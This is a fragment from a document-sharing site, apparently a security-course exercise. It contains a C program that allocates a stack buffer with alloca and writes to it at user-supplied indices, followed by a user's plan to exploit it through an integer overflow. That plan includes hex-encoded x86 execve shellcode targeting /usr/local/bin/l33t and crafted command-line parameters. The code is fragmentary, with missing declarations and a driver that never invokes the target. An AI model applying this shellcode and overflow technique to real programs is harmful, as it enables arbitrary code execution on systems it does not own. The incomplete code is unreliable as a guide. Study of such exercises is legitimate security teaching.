Professional Documents
Culture Documents
#include <alloca.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
length = atoi(argv[1]);
if (length <= 0) {
fprintf(stderr, "bad length\n");
return 1;
}
buffersize = length + 1;
buffer = alloca(buffersize);
memset(buffer, ' ', buffersize);
buffer[buffersize - 1] = 0;
buffer[index] = argv[i][0];
}
printf("%s\n", buffer);
return 0;
}
I do not have any write access inside this directory. I want to do an integer
overflow on this program and inject a shellcode into this program. The shellcode
should execute a “l33t” command which can be found in the directory
/usr/local/bin/l33t
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\xeb\x15\x5b\x31\xc0\x88\x43\x13\x89\x5b\x14\x89\x43\x18\x8d\x4b\x14"
"\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/usr/local/bin/l33t";
// shellcode string ^
int main() {
// Define the commandline parameters that VULN expects \xA228 \xFE29
\xFF30 \xBF31
char *cmdParam1 = "-1", *cmdParam2= "\xA2 43", *cmdParam3= "\xFE 29",
*cmdParam4= "\xFF 30", *cmdParam5= "\xBF 31";
return 0;
}